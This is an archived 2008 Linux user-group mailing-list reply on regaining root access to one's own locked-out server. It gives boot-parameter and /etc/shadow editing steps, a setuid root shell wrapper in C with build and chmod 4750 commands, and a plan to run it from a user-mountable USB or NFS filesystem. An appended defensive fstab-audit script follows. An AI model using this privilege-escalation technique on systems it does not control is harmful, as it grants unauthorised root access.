[nSLUG] Breaking into a server

Daniel Morrison draker at gmail.com
Tue Nov 18 19:44:00 AST 2008

2008/11/18 Robert McKay <robert at mckay.com>:
> On Tue, Nov 18, 2008 at 11:32 PM, Jim Haliburton <jim at on-site.ns.ca> wrote:
>> My question is what are the suggested ways to regain access to the system
>> as root to reset the passwords.

> If you can append additional boot parameters to the kernel in grub or
> lilo, it's usually just a case of adding

> init=/bin/sh

> If that doesn't work, I'd just get a boot cd; boot from that, mount
> the hard drive and edit the password out of /etc/shadow.

That is exactly correct.  If the 'init=/bin/sh' trick works, you will have to:
mount -o remount,rw /
in order to make the root filesystem writeable before you can edit /etc/shadow.

Booting with a generic Linux install CD is also good, but requires
downtime.  Before resorting to that, you might check /etc/fstab to see
what filesystems might be mountable WITHOUT the noexec, nosuid, and
root_squash options.  For example, there might be an entry for a
usb-stick or floppy disk.  If the filesystem type is 'vfat', that's no
good, but if it's "auto", then you could format a USB stick or floppy
disk with ext2, put a root-owned setuid shell/wrapper on it, mount the
USB stick, and run the setuid shell.  Similar for any NFS-mounted
filesystems from remote servers that you control.

(of course, this is an 'exploit' and should be fixed once you regain
control of the box!)

Here's a little 'setuid wrapper' program to make everything smooth:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

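int main (int argc, char *argv[]){
        /* Become root for real and effective UID; only works when this binary is setuid root. */
        if (setreuid((uid_t)0, (uid_t)0)) { perror ("setreuid"); }
        /* Replace this process with a login shell. */
        execl ("/bin/bash", "/bin/bash", "--login", (char *)NULL);
        /* Only reached if execl failed. */
        perror ("execl");
        return (1);
}

gcc -o setuid -s setuid.c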
chown root:mygroup setuid
chmod 4750 setuid
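
The /etc/fstab check described in the message, seen from the defender's side, as an added example that is not part of the original post: it lists mounts where setuid bits are still honoured on a filesystem an ordinary user can mount, or on an NFS mount. The names audit_fstab and sample_fstab are hypothetical and the fstab entries are constructed; the logic assumes the mount(8) rule that user, users, owner and group imply nosuid unless a later option overrides it.

```shell
#!/bin/sh
# Added example: report fstab entries that should carry nosuid.
# Reads fstab text from the files given as arguments, or from stdin.
audit_fstab() {
    awk '
    $1 ~ /^#/ || NF < 4 { next }       # skip comments, blank and short lines
    {
        mnt = $2; type = $3
        usermount = 0; suid = 1        # kernel default: setuid bits honoured
        n = split($4, opt, ",")
        for (i = 1; i <= n; i++) {     # order matters: later options win
            o = opt[i]
            if (o == "user" || o == "users" || o == "owner" || o == "group") {
                usermount = 1; suid = 0    # these imply nosuid
            }
            else if (o == "nouser") usermount = 0
            else if (o == "suid")   suid = 1
            else if (o == "nosuid") suid = 0
            # "defaults" is treated as a no-op here (simplification)
        }
        if (!suid) next
        # FAT has no Unix mode bits, so there is no setuid bit to honour
        if (type == "vfat" || type == "msdos") next
        if (usermount)
            print mnt, type, "user-mountable-suid"
        else if (type == "nfs" || type == "nfs4")
            print mnt, type, "nfs-suid"
    }' "$@"
}

# Constructed sample fstab (not from the original post).
sample_fstab() {
cat <<'EOF'
# device         mountpoint   type  options                  dump pass
/dev/sda1        /            ext3  defaults                 1 1
/dev/sdb1        /media/usb   auto  noauto,user,exec,suid    0 0
/dev/fd0         /media/fd    auto  noauto,user              0 0
/dev/sdc1        /media/cam   vfat  noauto,users,suid        0 0
filer:/export    /mnt/share   nfs   rw,hard,intr             0 0
filer:/home      /home        nfs   rw,nosuid,nodev          0 0
EOF
}

sample_fstab | audit_fstab
```

Run it against the real file with `audit_fstab /etc/fstab`; each reported mount point is a candidate for an explicit nosuid option.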

